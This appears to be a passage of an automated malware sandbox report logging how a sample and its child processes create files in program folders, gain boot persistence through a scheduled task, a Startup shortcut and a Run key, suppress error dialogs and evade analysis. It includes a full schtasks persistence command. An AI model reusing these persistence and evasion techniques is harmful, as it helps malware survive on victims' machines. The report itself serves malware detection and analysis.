                    Source: C:\Windows\System32\alg.exe | File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exe
                    Source: C:\Windows\System32\alg.exe | File created: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe
                    Source: C:\Windows\System32\alg.exe | File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exe
                    Source: C:\Windows\System32\alg.exe | File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe
                    Source: C:\Windows\System32\alg.exe | File created: C:\Program Files (x86)\Java\jre-1.8\bin\orbd.exe
                    Source: C:\Windows\System32\alg.exe | File created: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
                    Source: C:\Windows\System32\alg.exe | File created: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe
                    Source: C:\Windows\System32\alg.exe | File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe
                    Source: C:\Windows\System32\alg.exe | File created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe
                    Source: C:\Windows\System32\alg.exe | File created: C:\Program Files\Google\Chrome\Application\chrome_proxy.exe
                    Source: C:\Windows\System32\alg.exe | File created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateCore.exe
                    Source: C:\Windows\System32\alg.exe | File created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdate.exe
                    Source: C:\Windows\System32\alg.exe | File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe
                    Source: C:\Windows\System32\alg.exe | File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exe
                    Source: C:\Windows\System32\alg.exe | File created: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe
                    Source: C:\Windows\System32\alg.exe | File created: C:\Program Files (x86)\Google\Update\Install\{116021C8-78D2-448A-AAC4-399076E36F9D}\117.0.5938.149_117.0.5938.132_chrome_updater.exe
                    Source: C:\Windows\System32\alg.exe | File created: C:\Program Files (x86)\Java\jre-1.8\bin\ktab.exe
                    Source: C:\Windows\System32\alg.exe | File created: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe
                    Source: C:\Windows\System32\alg.exe | File created: C:\Program Files\Mozilla Firefox\plugin-container.exe
                    Source: C:\Windows\System32\alg.exe | File created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe

                    Boot Survival

                    Source: C:\Windows\SysWOW64\esentutl.exe | File created: C:\Users\Public\alpha.pif
                    Source: C:\Windows\SysWOW64\esentutl.exe | File created: C:\Users\Public\xpha.pif
                    Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 02:17 /du 23:59 /sc daily /ri 1 /f
                    Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\apihost.exe.lnk
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe | Code function: 13_2_006ECBD0 StrStrIW,CloseHandle,StrStrIW,CloseServiceHandle,OpenServiceW,StrStrIW,_wcslen,ChangeServiceConfigW,StrStrIW,StrStrIW,CloseServiceHandle,CloseHandle,StartServiceW, 13_2_006ECBD0
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Juqmtmya

                    Hooking and other Techniques for Hiding and Protection

                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exe | Code function: 0_2_02D0AB1C GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_02D0AB1C
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe | Registry key monitored for changes: HKEY_CURRENT_USER_Classes
                    Source: C:\Users\Public\Libraries\aymtmquJ.pif | Registry key monitored for changes: HKEY_CURRENT_USER_Classes
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\aymtmquJ.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Juqmtmya.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\aymtmquJ.pif Process information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Juqmtmya.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\aymtmquJ.pif Process information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe  Process information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe  Process information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe  WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe  Memory allocated: 2AC0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe  Memory allocated: 2EE0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe  Memory allocated: 2DA0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe  Memory allocated: 22C0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe  Memory allocated: 2380000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe  Memory allocated: 4380000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe  Memory allocated: 54C0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe  Memory allocated: 2D4C0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe  Memory allocated: 2C00000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe  Memory allocated: 2E70000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe  Memory allocated: 2CA0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe  Memory allocated: 2320000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe  Memory allocated: 24E0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe  Memory allocated: 44E0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe  Memory allocated: 2D00000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe  Memory allocated: 3170000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe  Memory allocated: 2D90000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe  Memory allocated: 840000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe  Memory allocated: 2370000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe  Memory allocated: 21B0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe  Memory allocated: B40000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe  Memory allocated: 26C0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe  Memory allocated: 2560000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe  Code function: 13_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear 13_2_004019F0
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe  Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe  Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe  Window / User API: threadDelayed 1668
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe  Window / User API: threadDelayed 419
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Window / User API: threadDelayed 4599
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe  Window / User API: threadDelayed 3068
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe  Window / User API: threadDelayed 6735
                    Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe  Window / User API: threadDelayed 9377
                    Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe  Window / User API: threadDelayed 410
                    Source: C:\Windows\System32\alg.exe  Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exe
                    Source: C:\Windows\System32\alg.exe  Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe
                    Source: C:\Windows\System32\alg.exe  Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateComRegisterShell64.exe
                    Source: C:\Windows\System32\alg.exe  Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\servertool.exe
                    Source: C:\Windows\System32\alg.exe  Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe
                    Source: C:\Windows\System32\alg.exe  Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\pingsender.exe
                    Source: C:\Windows\System32\alg.exe  Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXE
                    Source: C:\Windows\System32\alg.exe  Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe
                    Source: C:\Windows\System32\alg.exe  Dropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.149\chrome_pwa_launcher.exe
                    Source: C:\Windows\System32\alg.exe  Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe
                    Source: C:\Windows\System32\alg.exe  Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe  Dropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.149\elevation_service.exe
                    Source: C:\Windows\System32\alg.exe  Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
                    Source: C:\Windows\System32\alg.exe  Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\default-browser-agent.exe
                    Source: C:\Windows\System32\alg.exe  Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe
                    Source: C:\Windows\System32\alg.exe  Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe
                    Source: C:\Windows\System32\alg.exe  Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exe
                    Source: C:\Windows\System32\alg.exe  Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\filecompare.exe
                    Source: C:\Windows\System32\alg.exe  Dropped PE file which has not been started: C:\Program Files\7-Zip\7z.exe
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe  Dropped PE file which has not been started: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe
                    Source: C:\Windows\System32\alg.exe  Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exe
                    Source: C:\Windows\System32\alg.exe  Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\crashreporter.exe
                    Source: C:\Windows\System32\alg.exe  Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe
                    Source: C:\Windows\System32\alg.exe  Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_userers\64BitMAPIuserer.exe
                    Source: C:\Windows\System32\alg.exe  Dropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe
                    Source: C:\Windows\System32\alg.exe  Dropped PE file which has not been started: C:\Program Files\7-Zip\7zG.exe
                    Source: C:\Windows\System32\alg.exe  Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_userers\MSRMSPIuserer.exe
                    Source: C:\Windows\System32\alg.exe  Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\keytool.exe
                    Source: C:\Windows\System32\alg.exe  Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe
                    Source: C:\Windows\System32\alg.exe  Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe
                    Source: C:\Windows\System32\alg.exe  Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                    Source: C:\Windows\System32\alg.exe  Dropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.149\notification_helper.exe
                    Source: C:\Windows\System32\alg.exe  Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateuserer.exe
                    Source: C:\Windows\System32\alg.exe  Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe
                    Source: C:\Windows\System32\alg.exe  Dropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.149\Installer\chrmstp.exe
                    Source: C:\Windows\System32\alg.exe  Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exe
                    Source: C:\Windows\System32\alg.exe  Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe
                    Source: C:\Windows\System32\alg.exe  Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateSetup.exe
                    Source: C:\Windows\System32\alg.exe  Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe
                    Source: C:\Windows\System32\alg.exe  Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exe
                    Source: C:\Windows\System32\alg.exe  Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe
                    Source: C:\Windows\System32\alg.exe  Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exe
                    Source: C:\Windows\System32\alg.exe  Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_proxy.exe
                    Source: C:\Windows\System32\alg.exe  Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\maintenanceservice.exe
                    Source: C:\Windows\System32\alg.exe  Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe
                    Source: C:\Windows\System32\alg.exe  Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exe
                    Source: C:\Windows\System32\alg.exe  Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\firefox.exe
                    Source: C:\Windows\System32\alg.exe  Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe
                    Source: C:\Windows\System32\alg.exe  Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrouserer.exe
                    Source: C:\Windows\System32\alg.exe  Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe
                    Source: C:\Windows\System32\alg.exe  Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe
                    Source: C:\Windows\System32\alg.exe  Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exe
                    Source: C:\Windows\System32\alg.exe  Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\updater.exe
                    Source: C:\Windows\System32\alg.exe  Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\kinit.exe
                    Source: C:\Windows\System32\alg.exe  Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe
                    Source: C:\Windows\System32\alg.exe  Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Check.exe
                    Source: C:\Windows\System32\alg.exe  Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateuserer.exe
                    Source: C:\Windows\System32\alg.exe  Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\policytool.exe
                    Source: C:\Windows\System32\alg.exe  Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe
                    Source: C:\Windows\System32\alg.exe  Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe
                    Source: C:\Windows\System32\alg.exe  Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.ShowHelp.exe
                    Source: C:\Windows\System32\alg.exe  Dropped PE file which has not been started: C:\Program Files\7-Zip\Uninstall.exe
                    Source: C:\Windows\System32\alg.exe  Dropped PE file which has not been started: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe
                    Source: C:\Windows\System32\alg.exe  Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe
                    Source: C:\Users\Public\Libraries\aymtmquJ.pif  Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                    Source: C:\Windows\System32\alg.exe  Dropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe
                    Source: C:\Windows\System32\alg.exe  Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\rmiregistry.exe
                    Source: C:\Windows\System32\alg.exe  Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Integration\Addons\OneDriveSetup.exe
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe  Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe
                    Source: C:\Windows\System32\alg.exe  Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe
                    Source: C:\Windows\System32\alg.exe  Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe
                    Source: C:\Windows\System32\alg.exe  Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\CLVIEW.EXE
                    Source: C:\Windows\System32\alg.exe  Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe
                    Source: C:\Windows\System32\alg.exe  Dropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe
                    Source: C:\Windows\System32\alg.exe  Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe
                    Source: C:\Windows\System32\alg.exe  Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                    Source: C:\Windows\System32\alg.exe  Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe
                    Source: C:\Windows\System32\alg.exe  Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe
                    Source: C:\Windows\System32\alg.exe  Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exe
                    Source: C:\Windows\System32\alg.exe  Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                    Source: C:\Windows\System32\alg.exe  Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\pack200.exe
                    Source: C:\Windows\System32\alg.exe  Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe
                    Source: C:\Windows\System32\alg.exe  Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe
                    Source: C:\Windows\System32\alg.exe  Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateOnDemand.exe
                    Source: C:\Windows\System32\alg.exe  Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\rmid.exe
                    Source: C:\Windows\System32\alg.exe  Dropped PE file which has not been started: C:\Program Files\7-Zip\7zFM.exe
                    Source: C:\Windows\System32\alg.exe  Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe
